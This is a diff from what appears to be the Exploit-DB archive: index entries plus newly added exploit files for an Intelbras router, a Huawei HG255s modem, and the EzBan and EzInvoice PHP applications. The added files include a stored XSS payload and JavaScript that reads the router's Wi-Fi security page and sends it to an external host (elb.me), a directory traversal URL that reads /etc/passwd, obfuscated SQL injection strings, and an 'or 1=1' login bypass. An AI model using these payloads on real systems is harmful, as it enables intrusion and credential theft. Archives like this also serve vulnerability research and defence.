@ -38177,7 +38177,7 @@ id,file,description,date,author,platform,type,port
41989,platforms/php/webapps/41989.txt,"BanManager WebUI 1.5.8 - PHP Code Injection",2017-05-10,HaHwul,php,webapps,0
41990,platforms/php/webapps/41990.html,"Gongwalker API Manager 1.1 - Cross-Site Request Forgery",2017-05-10,HaHwul,php,webapps,0
41997,platforms/php/webapps/41997.txt,"CMS Made Simple 2.1.6 - Multiple Vulnerabilities",2017-05-10,"Osanda Malith",php,webapps,0
42003,platforms/php/webapps/42003.txt,"PlaySms 1.4 - Remote Code Execution",2017-05-14,"Touhid M.Shaikh",php,webapps,0
42003,platforms/php/webapps/42003.txt,"PlaySMS 1.4 - 'sendfromfile.php' Remote Code Execution / Unrestricted File Upload",2017-05-14,"Touhid M.Shaikh",php,webapps,80
42004,platforms/php/webapps/42004.txt,"Mailcow 0.14 - Cross-Site Request Forgery",2017-05-15,hyp3rlinx,php,webapps,0
42005,platforms/php/webapps/42005.txt,"Admidio 3.2.8 - Cross-Site Request Forgery",2017-04-28,"Faiz Ahmed Zaidi",php,webapps,0
42012,platforms/php/webapps/42012.txt,"Sophos Web Appliance 4.3.1.1 - Session Fixation",2017-02-28,SlidingWindow,php,webapps,0
@ -38410,5 +38410,9 @@ id,file,description,date,author,platform,type,port
42620,platforms/php/webapps/42620.txt,"Cory Support - 'pr' Parameter SQL Injection",2017-09-06,v3n0m,php,webapps,0
42622,platforms/php/webapps/42622.html,"Pay Banner Text Link Ad 1.0.6.1 - Cross-Site Request Forgery (Update Admin)",2017-09-06,"Ihsan Sencan",php,webapps,0
42623,platforms/php/webapps/42623.txt,"Pay Banner Text Link Ad 1.0.6.1 - SQL Injection",2017-09-06,"Ihsan Sencan",php,webapps,0
42628,platforms/php/webapps/42628.txt,"Ultimate HR System <= 1.2 - Directory Traversal / Cross-Site Scripting",2017-09-05,8bitsec,php,webapps,0
42628,platforms/php/webapps/42628.txt,"Ultimate HR System < 1.2 - Directory Traversal / Cross-Site Scripting",2017-09-05,8bitsec,php,webapps,0
42629,platforms/php/webapps/42629.txt,"Online Invoice System 3.0 - SQL Injection",2017-09-07,"Ihsan Sencan",php,webapps,0
42631,platforms/php/webapps/42631.txt,"EzBan 5.3 - 'id' Parameter SQL Injection",2017-09-07,"Ihsan Sencan",php,webapps,0
42632,platforms/php/webapps/42632.txt,"EzInvoice 6.02 - SQL Injection",2017-09-07,"Ihsan Sencan",php,webapps,0
42633,platforms/hardware/webapps/42633.txt,"Roteador Wireless Intelbras WRN150 - Cross-Site Scripting",2017-09-07,"Elber Tavares",hardware,webapps,0
42634,platforms/hardware/webapps/42634.txt,"Huawei HG255s - Directory Traversal",2017-09-07,"Ahmet Mersin",hardware,webapps,0

Can't render this file because it is too large.

37
platforms/hardware/webapps/42633.txt Executable file
View file

@ -0,0 +1,37 @@
# Exploit Title: XSS persistent on intelbras router with firmware WRN 250
# Date: 07/09/2017
# Exploit Author: Elber Tavares
# Vendor Homepage: http://intelbras.com.br/
# Version: Intelbras Wireless N 150Mbps - WRN 240
# Tested on: kali linux, windows 7, 8.1, 10
# CVE-2017-14219
For more info:
http://whiteboyz.xyz/xss-roteador-intelbras-wrn-240html
URL VULN: http://10.0.0.1/userRpm/popupSiteSurveyRpm.htm
Payload: </script><script src='//elb.me'>
"elb.me contains the malicious code on index"
airbase-ng -e "</script><script src='//elb.me'>" -c 8 -v wlan0mon
//requires an php script to get the logs
PoC:
var rawFile = new XMLHttpRequest();
rawFile.onreadystatechange = function() {
alert(rawFile.responseText);
var base64 = rawFile.responseText.split('>')[1].split("/SCRIPT")[0];
//seleiciona a parte da página com as credenciais
new Image().src="https://elb.me/cookie.php?ck="+btoa(base64);
//envia as credenciais encodadas em base64
};
rawFile.open("GET", "http://10.0.0.1/userRpm/WlanSecurityRpm.htm", true);
//pega a source da página /popupSiteSurveyRpm.htm
rawFile.send();

23
platforms/hardware/webapps/42634.txt Executable file
View file

@ -0,0 +1,23 @@
# Exploit Title: [Server Directory Traversal at Huawei HG255s]
# Date: [07.09.2017]
# Exploit Author: [Ahmet Mersin]
# Vendor Homepage: [www.huawei.com]
# Software Link: [Not published this modem just used by Turkey]
# Version: [V100R001C163B025SP02]
#POC:
https://www.youtube.com/watch?v=n02toTFkLOU&feature=youtu.be
http://192.168.1.1/css/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
#You want to follow my activity ?
https://www.linkedin.com/in/ahmet-mersin-177398b0/
@gaissecurity

2
platforms/linux/remote/19111.c
View file

@ -1,8 +1,10 @@
/*
source: http://www.securityfocus.com/bid/134/info
A buffer overflow exists in certain versions of BIND, the nameserver daemon currently maintained by the Internet Software Consortium (ISC). BIND fails to properly bound the data recieved when processing an inverse query. Upon a memory copy, portions of the program can be overwritten, and arbitrary commands run on the affected host.
Exploits for this vulnerability are very widespread, and were posted to the Bugtraq mailing list.
*/
/*
* have fun.

2
platforms/linux/remote/19112.c
View file

@ -1,8 +1,10 @@
/*
source: http://www.securityfocus.com/bid/134/info
A buffer overflow exists in certain versions of BIND, the nameserver daemon currently maintained by the Internet Software Consortium (ISC). BIND fails to properly bound the data recieved when processing an inverse query. Upon a memory copy, portions of the program can be overwritten, and arbitrary commands run on the affected host.
Exploits for this vulnerability are very widespread, and were posted to the Bugtraq mailing list.
*/
/*
* z, thnx.

27
platforms/php/webapps/42631.txt Executable file
View file

@ -0,0 +1,27 @@
# # # # #
# Exploit Title: EzBan - Banner Management System 5.3 - SQL Injection
# Dork: N/A
# Date: 07.09.2017
# Vendor Homepage: http://www.mysticdreams.net/
# Software Link: http://www.mysticdreams.net/resources/ezban_demo.zip
# Demo: http://www.mysticdreams.net/products/ezban/
# Version: 5.3
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# Sql
# http://localhost/[PATH]/ezban.php?id=[SQL]&action=show
# 100++aND(/*!00002SelEcT*/+0x30783331+/*!00002frOM*/+(/*!00002SelEcT*/+cOUNT(*),/*!00002cOnCaT*/((/*!00002sELECT*/(/*!00002sELECT*/+/*!00002cOnCaT*/(cAST(dATABASE()+aS+/*!00002cHAR*/),0x7e,0x496873616E53656e63616e))+/*!00002FRoM*/+iNFORMATION_sCHEMA.tABLES+/*!00002wHERE*/+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(/*!00002rAND*/(0)*2))x+/*!00002FRoM*/+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+/*!00002aNd*/+1=1&action=show
#
# Etc...
# # # # #

34
platforms/php/webapps/42632.txt Executable file
View file

@ -0,0 +1,34 @@
# # # # #
# Exploit Title: EzInvoice - Invoice Management System 6.0.2 - SQL Injection
# Dork: N/A
# Date: 07.09.2017
# Vendor Homepage: http://www.mysticdreams.net/
# Software Link: http://www.mysticdreams.net/resources/ezinvoice_demo.zip
# Demo: http://www.mysticdreams.net/products/ezinvoice/
# Version: 6.0.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# Sql
# http://localhost/[PATH]/editclient.php?id=[SQL]
# -100+/*!11122UniOn*/+/*!11122SeleCt*/+0x283129,/*!11122CONCAT_WS*/(0x203a20,/*!11122USER*/(),/*!11122DATABASE*/(),VERSION()),0x283329,/*!11122CONCAT_WS*/(0x203a20,/*!11122USER*/(),/*!11122DATABASE*/(),VERSION()),/*!11122CONCAT_WS*/(0x203a20,/*!11122USER*/(),/*!11122DATABASE*/(),VERSION()),/*!11122CONCAT_WS*/(0x203a20,/*!11122USER*/(),/*!11122DATABASE*/(),VERSION())--+-
#
# Bypass
# http://localhost/[PATH]/index.php
# User: 'or 1=1 or ''=' Pass: anything
#
# Backup
# http://localhost/[PATH]/backups/index.php?client_name=admin
#
# Etc...
# # # # #